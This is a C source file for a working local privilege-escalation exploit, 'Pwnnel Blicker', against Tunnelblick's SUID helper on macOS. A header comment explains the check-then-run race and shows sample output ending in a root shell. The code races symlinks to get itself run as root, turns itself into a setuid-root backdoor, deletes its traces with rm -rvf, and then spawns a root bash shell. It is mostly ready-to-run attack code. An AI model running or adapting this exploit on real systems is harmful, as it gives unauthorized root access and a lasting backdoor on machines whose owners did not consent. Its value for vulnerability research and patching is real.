/*
 * ==== Pwnnel Blicker ====
 * =                      =
 * =        zx2c4         =
 * =                      =
 * ========================
 *
 * Tunnel Blick, a widely used OpenVPN manager for OSX
 * comes with a nice SUID executable that has more holes
 * than you care to count. It's a treasure chest of local
 * roots. I picked one that looked interesting, and here
 * we have Pwnnel Blicker.
 *
 * Tunnel Blick will run any executable that has 744
 * permissions and is owned by root:root. Probably we
 * could find a way to exploit an already existing 744
 * executable, but this would be too easy. So instead, we
 * take advantage of a race condition between checking the
 * file permissions on the executable and actually running
 * it.
 *
 * Usage:
 * $ ./a.out
 * [+] Creating vulnerable directory.
 * /Users/zx2c4/Library/Application Support/Tunnelblick/Configurations/pwnage.tblk
 * /Users/zx2c4/Library/Application Support/Tunnelblick/Configurations/pwnage.tblk/Contents
 * /Users/zx2c4/Library/Application Support/Tunnelblick/Configurations/pwnage.tblk/Contents/Resources
 * [+] Writing pid and executing vulnerable program.
 * [+] Running toggler.
 * [+] Making backdoor.
 * [+] Cleaning up.
 * /Users/zx2c4/Library/Application Support/Tunnelblick/Configurations/pwnage.tblk/Contents/Resources/../../..//pwnage.tblk/Contents/Resources/exploit.pid
 * [+] Complete. Run this again to get root.
 * Killed: 9
 *
 * $ ./a.out
 * [+] Getting root.
 * # whoami
 * root
 *
 */
 
 
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <sys/stat.h>
 
int main(int argc, char *argv[])
{
    char dir[512];
    char script[512];
    char command[512];
    char pid_file[512];
    char path[512];
    char self[512];
    uint32_t size;
    pid_t pid, pid2;
    FILE *file;
     
    snprintf(dir, sizeof(dir), "%s/Library/Application Support/Tunnelblick/Configurations/pwnage.tblk/Contents/Resources", getenv("HOME"));
    snprintf(pid_file, sizeof(pid_file), "%s/exploit.pid", dir);
 
    /* Oh god, do I miss /proc/self/exe. */
    if (getenv("PWNPATH"))
        strcpy(self, getenv("PWNPATH"));
    else {
        size = sizeof(path);
        _NSGetExecutablePath(path, &size);
        realpath(path, self);
        setenv("PWNPATH", self, 1);
    }
 
    if (!geteuid()) {
        file = fopen(pid_file, "r");
        if (file) {
            printf("[+] Making backdoor.\n");
            chown(self, 0, 0);
            chmod(self, S_ISUID | S_IXOTH);
 
            printf("[+] Cleaning up.\n");
            fscanf(file, "%d %d", &pid, &pid2);
            fclose(file);
            snprintf(command, sizeof(command), "rm -rvf '%s/../../../'", dir);
            system(command);
         
            printf("[+] Complete. Run this again to get root.\n");
            kill(pid2, 9);
            kill(pid, 9);
            return 0;
        }
        printf("[+] Getting root.\n");
        setuid(0);
        setgid(0);
        execl("/bin/bash", "bash", NULL);
    }
 
 
    printf("[+] Creating vulnerable directory.\n");
    snprintf(command, sizeof(command), "mkdir -p -v '%s'", dir);
    system(command);
 
    pid = fork();
    if (!pid) {
        printf("[+] Running toggler.\n");
        snprintf(script, sizeof(script), "%s/connected.sh", dir);
        for (;;) {
            unlink(script);
            symlink("/Applications/Tunnelblick.app/Contents/Resources/client.down.tunnelblick.sh", script);
            unlink(script);
            symlink(self, script);
        }
    } else {
        printf("[+] Writing pid and executing vulnerable program.\n");
        file = fopen(pid_file, "w");
        fprintf(file, "%d %d", pid, getpid());
        fclose(file);
        for (;;) {
            if (fork())
                wait(NULL);
            else {
                close(0);
                close(2);
                execl("/Applications/Tunnelblick.app/Contents/Resources/openvpnstart", "openvpnstart", "connected", "pwnage.tblk", "0", NULL);
            }
        }
    }
 
    return 0;  
}